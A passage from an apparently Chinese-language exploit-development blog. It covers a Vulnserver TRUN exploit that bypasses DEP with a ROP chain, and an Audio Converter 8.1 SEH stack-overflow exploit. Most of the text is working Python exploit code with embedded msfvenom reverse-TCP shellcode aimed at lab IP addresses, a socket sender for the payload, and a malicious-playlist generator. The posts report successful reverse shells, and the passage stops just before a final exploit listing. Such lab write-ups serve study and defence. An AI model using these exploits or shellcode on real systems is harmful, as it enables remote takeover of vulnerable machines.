encodedShell.replace(struct.pack(<span class="string">"B"</span>, BADCHARS[i]), struct.pack(<span class="string">"B"</span>, REPLACECHARS[i]))</span><br><span class="line"> <span class="keyword">return</span> encodedShell</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decodeShellcode</span><span class="params">(dllBase, badIndex, shellcode)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00\x09\x0a"</span></span><br><span class="line"> CHARSTOADD = <span class="string">b"\x01\xf9\x04"</span></span><br><span class="line"> restoreRop = <span class="string">b""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(badIndex)):</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> offset = badIndex[i]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> offset = badIndex[i] - badIndex[i<span class="number">-1</span>]</span><br><span class="line"> neg_offset = (-offset) & <span class="number">0xffffffff</span></span><br><span class="line"> value = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> <span class="keyword">if</span> shellcode[badIndex[i]] == BADCHARS[j]:</span><br><span class="line"> value = CHARSTOADD[j]</span><br><span class="line"> value = (value) | <span class="number">0x11111100</span> <span class="comment"># DL</span></span><br><span class="line"> print(hex(value))</span><br><span class="line"></span><br><span class="line"> <span class="comment"># current EAX point to the address of shellcode-1</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x7637768e</span>)) <span class="comment"># POP ECX # RETN ** [WS2_32.DLL] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (neg_offset))</span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x758ba9a8</span>)) <span class="comment"># SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** </span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (<span class="number">0x7721aed0</span>)) <span class="comment"># POP EDX # RETN ** [ntdll.dll] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (value)) <span class="comment"># values in DL</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x755bc4eb</span>)) <span class="comment"># ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** </span></span><br><span class="line"> <span class="keyword">return</span> restoreRop </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode</span></span><br><span class="line"> shellcode = <span class="string">b""</span></span><br><span class="line"> shellcode += <span class="string">b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"</span></span><br><span class="line"> shellcode += <span class="string">b"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"</span></span><br><span class="line"> shellcode += <span class="string">b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"</span></span><br><span class="line"> shellcode += <span class="string">b"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"</span></span><br><span class="line"> shellcode += <span class="string">b"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"</span></span><br><span class="line"> shellcode += <span class="string">b"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"</span></span><br><span class="line"> shellcode += <span class="string">b"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"</span></span><br><span class="line"> shellcode += <span class="string">b"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"</span></span><br><span class="line"> shellcode += <span class="string">b"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"</span></span><br><span class="line"> shellcode += <span class="string">b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"</span></span><br><span class="line"> shellcode += <span class="string">b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"</span></span><br><span class="line"> shellcode += <span class="string">b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"</span></span><br><span class="line"> shellcode += <span class="string">b"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"</span></span><br><span class="line"> shellcode += <span class="string">b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40"</span></span><br><span class="line"> shellcode += <span class="string">b"\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"</span></span><br><span class="line"> shellcode += <span class="string">b"\x6a\x05\x68\xc0\xa8\x5b\x89\x68\x02\x00\x11"</span></span><br><span class="line"> shellcode += <span class="string">b"\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74"</span></span><br><span class="line"> shellcode += <span class="string">b"\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75"</span></span><br><span class="line"> shellcode += <span class="string">b"\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d"</span></span><br><span class="line"> shellcode += <span class="string">b"\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12"</span></span><br><span class="line"> shellcode += <span class="string">b"\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"</span></span><br><span class="line"> shellcode += <span class="string">b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"</span></span><br><span class="line"> shellcode += <span class="string">b"\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"</span></span><br><span class="line"> shellcode += <span class="string">b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a"</span></span><br><span class="line"> shellcode += <span class="string">b"\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"</span></span><br><span class="line"> shellcode += <span class="string">b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f"</span></span><br><span class="line"> shellcode += <span class="string">b"\x6a\x00\x53\xff\xd5"</span></span><br><span class="line"></span><br><span class="line"> pos = mapBadChars(shellcode)</span><br><span class="line"> print(pos)</span><br><span class="line"> encodedRevShell = encodeShellcode(shellcode)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory Address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501022</span>) <span class="comment"># retn essfunc.dll</span></span><br><span class="line"> <span class="comment"># save ESP to ESI,EDX,EAX</span></span><br><span class="line"> rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching dummy lpBuffer</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7777798c</span>) <span class="comment"># 0x7777798c</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching dummy nSize</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffffdf4</span>) <span class="comment"># 0xfffffdf4</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching WriteProcessMemory Address</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x62506090</span>) <span class="comment"># IAT 62506090 AddAtomA KERNEL32 </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75fd7518</span>) <span class="comment"># XCHG EAX,DWORD PTR [ECX] # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7557771b</span>) <span class="comment"># POP EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffd9df0</span>) <span class="comment"># 0xfffd9df0</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># save current EAX to EBX</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7730e63c</span>) <span class="comment"># XCHG EAX,ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75f84c67</span>) <span class="comment"># MOV EAX,ESI # RETN</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Align EAX with shellcode</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffffd78</span>) <span class="comment"># 0n648</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772974e4</span>) <span class="comment"># SUB EAX,ECX # RETN ** [ntdll.dll] ** </span></span><br><span class="line"></span><br><span class="line"> rop1 += decodeShellcode(<span class="number">0</span>, pos, shellcode)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Align ESP with ROP Skeleton</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7730e63c</span>) <span class="comment"># XCHG EAX,ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f2002</span>) <span class="comment"># XCHG EAX,ESP # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment"># padding = b"C" * (3000-2006-32-len(rop1)-len(shellcode))</span></span><br><span class="line"> padding = <span class="string">b"\x44"</span> * <span class="number">1000</span></span><br><span class="line"></span><br><span class="line"> PAYLOAD = (</span><br><span class="line"> <span class="string">b'TRUN .'</span> +</span><br><span class="line"> <span class="string">b'A'</span> * (<span class="number">2006</span>-len(func)) +</span><br><span class="line"> func +</span><br><span class="line"> eip +</span><br><span class="line"> rop1 + </span><br><span class="line"> <span class="string">b"\x90"</span>*<span class="number">80</span>+</span><br><span class="line"> encodedRevShell+</span><br><span class="line"> padding</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> socket.create_connection((HOST, PORT)) <span class="keyword">as</span> fd:</span><br><span class="line"> fd.sendall(PAYLOAD)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
<p>喜闻乐见的反弹<code>shell</code>如下:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/21.png" alt="BOF"></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/" class="post-title-link" itemprop="url">Audio Converter 8.1 - SEH Stack Buffer Overflow:DEP and ASLR bypass</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-11 23:06:13" itemprop="dateCreated datePublished" datetime="2022-05-11T23:06:13Z">2022-05-11</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-05-14 13:49:02" itemprop="dateModified" datetime="2022-05-14T13:49:02Z">2022-05-14</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>本次讨论的<code>Audio Converter 8.1</code>在<code>Win7 SP1 6.1.7601</code>和<code>Win10 10.0.19044</code>两者之间有一些不同,在<code>Win7</code>下漏洞能够利用成功,在<code>Win10</code>下会出现<code>SEH Handler</code>无法捕捉到异常,导致漏洞执行失败。</p>
<p>先来看<code>Win7</code>下的漏洞利用:之前遇到的<code>SEH</code>栈溢出漏洞,覆盖的都是<code>SEH</code>链的第一个<code>NSEH</code>和<code>SEH Handler</code>,而这里覆盖的是第二个<code>NSEH</code>和<code>SEH Handler</code>。简单的部分就不说了,<code>Win7</code>下<code>Offset</code>为<code>4432</code>(覆盖<code>NSEH</code>的值),坏字符为<code>\x00\x0a</code>。</p>
<p>看一下溢出的时候,其实是<code>SEH</code>链第二个节点被覆盖:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/01.png" alt="BOF"></p>
<p>但是,这不影响漏洞利用的方式,还是<code>P/P/R</code>结合<code>JMP</code>,如果当前异常处理函数无法处理异常,则会转到下一个异常处理函数处理,所以覆盖的异常处理函数是可以得到执行的,进而执行写入的<code>shellcode</code>。考虑要<code>bypass ASLR</code>,所以需要找到未开启<code>ASLR</code>的<code>DLL</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/02.png" alt="BOF"></p>
<p><code>win7</code>下没有开启全局<code>DEP</code>时,就是简单的<code>SEH</code> 栈溢出,最终的利用代码如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">filename=<span class="string">"exploit.pls"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x3d' </span></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xdd\xc6\xd9\x74\x24\xf4\x58\x33\xc9\xbe\xab"</span></span><br><span class="line">shellcode += <span class="string">b"\x77\x29\x71\xb1\x52\x31\x70\x17\x03\x70\x17"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x43\x8b\xcb\x84\x6f\x9c\x8e\x67\x8f\x5d"</span></span><br><span class="line">shellcode += <span class="string">b"\xef\xee\x6a\x6c\x2f\x94\xff\xdf\x9f\xde\xad"</span></span><br><span class="line">shellcode += <span class="string">b"\xd3\x54\xb2\x45\x67\x18\x1b\x6a\xc0\x97\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\x45\xd1\x84\xbe\xc4\x51\xd7\x92\x26\x6b\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xe7\x27\xac\x45\x0a\x75\x65\x01\xb9\x69\x02"</span></span><br><span class="line">shellcode += <span class="string">b"\x5f\x02\x02\x58\x71\x02\xf7\x29\x70\x23\xa6"</span></span><br><span class="line">shellcode += <span class="string">b"\x22\x2b\xe3\x49\xe6\x47\xaa\x51\xeb\x62\x64"</span></span><br><span class="line">shellcode += <span class="string">b"\xea\xdf\x19\x77\x3a\x2e\xe1\xd4\x03\x9e\x10"</span></span><br><span class="line">shellcode += <span class="string">b"\x24\x44\x19\xcb\x53\xbc\x59\x76\x64\x7b\x23"</span></span><br><span class="line">shellcode += <span class="string">b"\xac\xe1\x9f\x83\x27\x51\x7b\x35\xeb\x04\x08"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x40\x42\x56\x5e\x57\x87\xed\x5a\xdc\x26"</span></span><br><span class="line">shellcode += <span class="string">b"\x21\xeb\xa6\x0c\xe5\xb7\x7d\x2c\xbc\x1d\xd3"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\xde\xfd\x8c\xf7\x95\x10\xd8\x85\xf4\x7c"</span></span><br><span class="line">shellcode += <span class="string">b"\x2d\xa4\x06\x7d\x39\xbf\x75\x4f\xe6\x6b\x11"</span></span><br><span class="line">shellcode += <span class="string">b"\xe3\x6f\xb2\xe6\x04\x5a\x02\x78\xfb\x65\x73"</span></span><br><span class="line">shellcode += <span class="string">b"\x51\x38\x31\x23\xc9\xe9\x3a\xa8\x09\x15\xef"</span></span><br><span class="line">shellcode += <span class="string">b"\x7f\x59\xb9\x40\xc0\x09\x79\x31\xa8\x43\x76"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\xc8\x6c\x5c\x07\x63\x97\x37\xe8\xdc\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x4e\x80\x1e\xf2\x41\x0d\x96\x14\x0b\xbd\xfe"</span></span><br><span class="line">shellcode += <span class="string">b"\x8f\xa4\x24\x5b\x5b\x54\xa8\x71\x26\x56\x22"</span></span><br><span class="line">shellcode += <span class="string">b"\x76\xd7\x19\xc3\xf3\xcb\xce\x23\x4e\xb1\x59"</span></span><br><span class="line">shellcode += <span class="string">b"\x3b\x64\xdd\x06\xae\xe3\x1d\x40\xd3\xbb\x4a"</span></span><br><span class="line">shellcode += <span class="string">b"\x05\x25\xb2\x1e\xbb\x1c\x6c\x3c\x46\xf8\x57"</span></span><br><span class="line">shellcode += <span class="string">b"\x84\x9d\x39\x59\x05\x53\x05\x7d\x15\xad\x86"</span></span><br><span class="line">shellcode += <span class="string">b"\x39\x41\x61\xd1\x97\x3f\xc7\x8b\x59\xe9\x91"</span></span><br><span class="line">shellcode += <span class="string">b"\x60\x30\x7d\x67\x4b\x83\xfb\x68\x86\x75\xe3"</span></span><br><span class="line">shellcode += <span class="string">b"\xd9\x7f\xc0\x1c\xd5\x17\xc4\x65\x0b\x88\x2b"</span></span><br><span class="line">shellcode += <span class="string">b"\xbc\x8f\xa8\xc9\x14\xfa\x40\x54\xfd\x47\x0d"</span></span><br><span class="line">shellcode += <span class="string">b"\x67\x28\x8b\x28\xe4\xd8\x74\xcf\xf4\xa9\x71"</span></span><br><span class="line">shellcode += <span class="string">b"\x8b\xb2\x42\x08\x84\x56\x64\xbf\xa5\x72"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># badchars: \x00\x3d</span></span><br><span class="line">payload=<span class="string">b"A"</span>*<span class="number">4432</span></span><br><span class="line">payload+=<span class="string">b"\xeb\x06\x90\x90"</span></span><br><span class="line">payload += struct.pack(<span class="string">"<L"</span>,<span class="number">0x1002b51c</span>)</span><br><span class="line">payload+=<span class="string">b"\x90"</span>*<span class="number">16</span></span><br><span class="line">payload+=shellcode</span><br><span class="line">payload+=<span class="string">b"C"</span>*(<span class="number">45544</span>-len(shellcode))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open(<span class="string">"exploit.pls"</span>, <span class="string">"wb"</span>) <span class="keyword">as</span> fp:</span><br><span class="line"> fp.write(payload)</span><br></pre></td></tr></table></figure>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/03.png" alt="BOF"></p>
<p>现在开启全局<code>DEP</code>,来看一下,基本的步骤就不说了,截图几张:</p>
<p>利用<code>mona</code>,在每个<code>SEH Handler</code>下断点,这个方法还挺方便的:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/04.png" alt="BOF"></p>
<p>查找<code>ROP Chain</code>在内存的位置:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/05.png" alt="BOF"></p>
<p>执行到触发<code>SEH</code>之后,查看此刻<code>ESP</code>,得到<code>ROP Chain</code>与<code>ROP</code>之间的距离:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/06.png" alt="BOF"></p>
<p>利用<code>mona</code>寻找跳转大于等于<code>2412</code>的<code>ROP Gadget</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/07.png" alt="BOF"></p>
<p>在生成的<code>stackpivot.txt</code>文件中挑选符合要求的<code>ROP Gadget</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/08.png" alt="BOF"></p>
<p>这里选择<code>0x100646bb</code>作为覆盖<code>seh</code>的地址。注意跳转了<code>3652</code>个字节,需要在<code>ROP Chain</code>前面填充一些<code>\x90</code>,不然会跳转到<code>ROP Chain</code>内部,导致无法执行。经过多次尝试,需要添加<code>1348</code>个<code>\x90</code>才能精确到达<code>ROP Chain</code>的最开始部分。</p>
<p>最终的利用代码如下:</p>
